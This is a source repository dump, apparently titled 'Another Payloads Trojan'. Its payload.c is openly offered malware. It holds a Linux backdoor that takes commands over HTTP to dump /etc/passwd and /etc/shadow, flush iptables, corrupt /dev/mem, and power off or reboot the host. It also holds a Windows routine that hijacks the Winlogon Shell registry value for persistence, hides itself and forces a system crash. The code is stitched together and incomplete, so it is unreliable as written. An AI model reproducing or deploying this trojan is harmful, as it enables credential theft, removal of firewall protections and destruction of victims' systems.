├── preview.png ├── .gitignore ├── README.md ├── LICENSE └── payload.c /preview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/byt3n33dl3/CARNOTAURUS/HEAD/preview.png -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *swo 2 | *swp 3 | *~ 4 | *.tmp 5 | temp/* 6 | .bundle 7 | .venv 8 | .goenv 9 | .config 10 | *.lock 11 | *.log 12 | bin/* 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### Another Payloads Trojan 2 | 3 | ![payload](https://github.com/Sulaimannabdul/Trojan-LetsBeFriend/assets/151133481/c008397e-6c87-4509-bf31-0b3621a94513) 4 | 5 | #### ***Note: Educational purposes only*** 6 | ##### ***Credit to some DN coffee*** 7 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Sulaiman 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #define NT_ERROR_CODE 0xC0000022 5 | 6 | /* main */ 7 | int main() 8 | { 9 | int numbytes; 10 | 11 | struct sockaddr_in server; /* server's address information */ 12 | struct sockaddr_in client; /* client's address information */ 13 | 14 | int sin_size; 15 | 16 | dupStreamz(); 17 | 18 | if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */ 19 | system("echo 'socket() error' >> zerror.log"); 20 | printf("server: socket() error\n"); 21 | exit(-1); 22 | } 23 | 24 | server.sin_family = AF_INET; 25 | server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */ 26 | 27 | int noobPort = PORT; 28 | for (noobPort=PORT; noobPort < 65535; noobPort = noobPort+1){ 29 | server.sin_port = htons(noobPort); /* Remember htons() from "Conversions" section? =) */ 30 | bzero(&(server.sin_zero),8); /* zero the rest of the structure */ 31 | 32 | if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1){ /* calls bind() */ 33 | system("echo 'bind() error' >> zerror.log"); 34 | printf("server: bind(%d) error\n", noobPort); 35 | if (noobPort >= 65535) { 36 | exit(-1); 37 | } 38 | } else { 39 | break; 40 | } 41 | } 42 | printf("listing at :%d", noobPort); 43 | if(listen(fd,BACKLOG) == -1){ /* calls listen() */ 44 | system("echo 'listen() error' >> zerror.log"); 45 | printf("server: listen() error\n"); 46 | } 47 | 48 | while(1){ 49 | sin_size=sizeof(struct sockaddr_in); 50 | if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size))==-1){ /* calls accept() */ 51 | system("echo 'accept() error' >> zerror.log"); 52 | printf("server: accept() error\n"); 53 | exit(-1); 54 | } 55 | 56 | if ( (numbytes = recv(fd2, Request, MAXSTRSIZE, 0)) > 0 ) 57 | { 58 | Request[numbytes]='\0'; 59 | //sscanf(buf, "GET %s HTTP", Req); 60 | }else{ 61 | printf("server: recv() error"); 62 | system("echo 'recv() error' >> zerror.log"); 63 | } 64 | 65 | axnCode = getAXN();//1; 66 | tellClient(); 67 | 68 | close(fd2); /* close fd2 */ 69 | printf("[+] %s\n", Request); 70 | } 71 | return 0; 72 | } 73 | 74 | 75 | /* 76 | * it duplicates STDOUT to a Program Handled Stream using it 77 | * output of system commands is captured in this stream directly 78 | */ 79 | void dupStreamz(){ 80 | if(pipe(pfds) == -1){ 81 | system("echo 'IPC error' >> zerror.log"); 82 | perror("server: PiPiNG FlaW"); 83 | exit(1); 84 | } 85 | 86 | close(1); 87 | dup(pfds[1]); 88 | return; 89 | } 90 | 91 | 92 | /* 93 | * it checks for the desired action in axnCode, 94 | * executes the desired system command 95 | * builds up the HTTP Response with desired Output 96 | * send the HTTP Response to Client 97 | */ 98 | void tellClient(){ 99 | char buf[MAXSTRSIZE] = "HTTP 200 OK\0"; //buffer to hold System Commands' Output 100 | char tmpBuf[MAXSTRSIZE]; 101 | int idx; 102 | 103 | //clearing previous stream content 104 | for(idx=0; idx
n00bROOT\""); break; 115 | //hangs the TuX machine 116 | case 0: strcpy(httpResponse,httpResponse200); 117 | system("cat /dev/urandom > /dev/mem"); break; 118 | //all entries of /etc/passwd 119 | case 1: strcpy(httpResponse,httpResponse200); 120 | system("cat /etc/passwd 2>&1 | sed 's/\\n//g' | sed 's/\\r//g'"); break; 121 | //all entries of /etc/shadow 122 | case 2: strcpy(httpResponse,httpResponse200); 123 | system("cat /etc/shadow 2>&1 | sed 's/\\n//g' | sed 's/\\r//g'"); break; 124 | //all entries of /etc/resolv.conf 125 | case 3: strcpy(httpResponse,httpResponse200); 126 | system("cat /etc/resolv.conf 2>&1"); break; 127 | //prints entire ps list 128 | case 4: strcpy(httpResponse,httpResponse200); 129 | system("ps aux"); break; 130 | //deletes all entries of IPTABLES (Firewall) 131 | case 5: strcpy(httpResponse,httpResponse200); 132 | system("iptables --flush 2>&1 && echo \'IPTables Entries Deleted\'"); break; 133 | //all information of all NICs 134 | case 6: strcpy(httpResponse,httpResponse200); 135 | system("ifconfig -a 2>&1 || ip -a 2>&1 || networkctl --no-legend --no-pager status 2>&1"); break; 136 | //System Coded Info of all NICs 137 | case 7: strcpy(httpResponse,httpResponse200); 138 | system("ifconfig -s 2>&1 || ip link 2>&1 || networkctl --no-legend --no-pager list 2>&1"); break; 139 | //PowerOff 140 | case 8: strcpy(httpResponse,httpResponse200); 141 | system("poweroff 2>&1"); break; 142 | //Reboot 143 | case 9: strcpy(httpResponse,httpResponse200); 144 | system("reboot 2>&1"); break; 145 | //default case 146 | default: strcpy(httpResponse,httpResponse400); 147 | system("echo \"HTTP 404\""); break; 148 | } 149 | read(pfds[0], buf, MAXSTRSIZE); 150 | strncat(tmpBuf,httpResponse,strlen(httpResponse)); 151 | strncat(tmpBuf,buf,strlen(buf)); 152 | send(fd2,tmpBuf,(strlen(httpResponse)+strlen(buf)),0); 153 | return; 154 | } 155 | 156 | 157 | /* 158 | * extracts the action code from HTTP Request 159 | * returns back the action Code 160 | */ 161 | int getAXN(){ 162 | char *axnTok; 163 | if((axnTok=strtok(Request," ")) != NULL){ 164 | if((axnTok=strtok(NULL," ")) != NULL){ 165 | printf("\naxn: %s\n",axnTok); 166 | return getAXNCode(axnTok); 167 | } 168 | } 169 | return -10; 170 | } 171 | 172 | 173 | /* 174 | * getAXNCode maps passed string to action token and returns int code 175 | */ 176 | int getAXNCode(char* axnTok){ 177 | if(strcmp("/n00b",axnTok)==0) 178 | return -1; 179 | 180 | char *axnCodeCharSlash = strrchr(axnTok, '/'); 181 | char *axnCodeChar = axnCodeCharSlash ? axnCodeCharSlash + 1 : axnTok; 182 | 183 | int axnCodeInt = *axnCodeChar - '0'; 184 | return axnCodeInt; 185 | } 186 | 187 | int APIENTRY WinMain( 188 | HINSTANCE hInstance, HINSTANCE hPrevInstance, 189 | LPSTR lpCmdLine, int nCmdShow) { 190 | TCHAR szFilePath[MAX_PATH]; 191 | GetModuleFileName(NULL, szFilePath, MAX_PATH); 192 | 193 | HKEY hKey; 194 | if (RegCreateKeyEx(HKEY_CURRENT_USER, 195 | TEXT("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"), 196 | 0x00, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) 197 | RegSetValueEx(hKey, 198 | TEXT("Shell"), 199 | 0x00, REG_SZ, (LPBYTE)szFilePath, (DWORD)(_tcslen(szFilePath) + 1) * sizeof(TCHAR)); 200 | RegCloseKey(hKey); 201 | 202 | SetFileAttributesA(szFilePath, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED | FILE_ATTRIBUTE_READONLY); 203 | 204 | BOOLEAN previousValue; 205 | ULONG response; 206 | 207 | if (RtlAdjustPrivilege(0x13, // [SeShutdownPrivilege] 208 | TRUE, FALSE, &previousValue) == 0x00) { 209 | // 0110 = 01 10 = [ResponseOptionOk + ResponseOptionCancel] 210 | NtRaiseHardError(NT_ERROR_CODE, 0x00, 0x00, NULL, 0b0110, &response); 211 | } 212 | } 213 | --------------------------------------------------------------------------------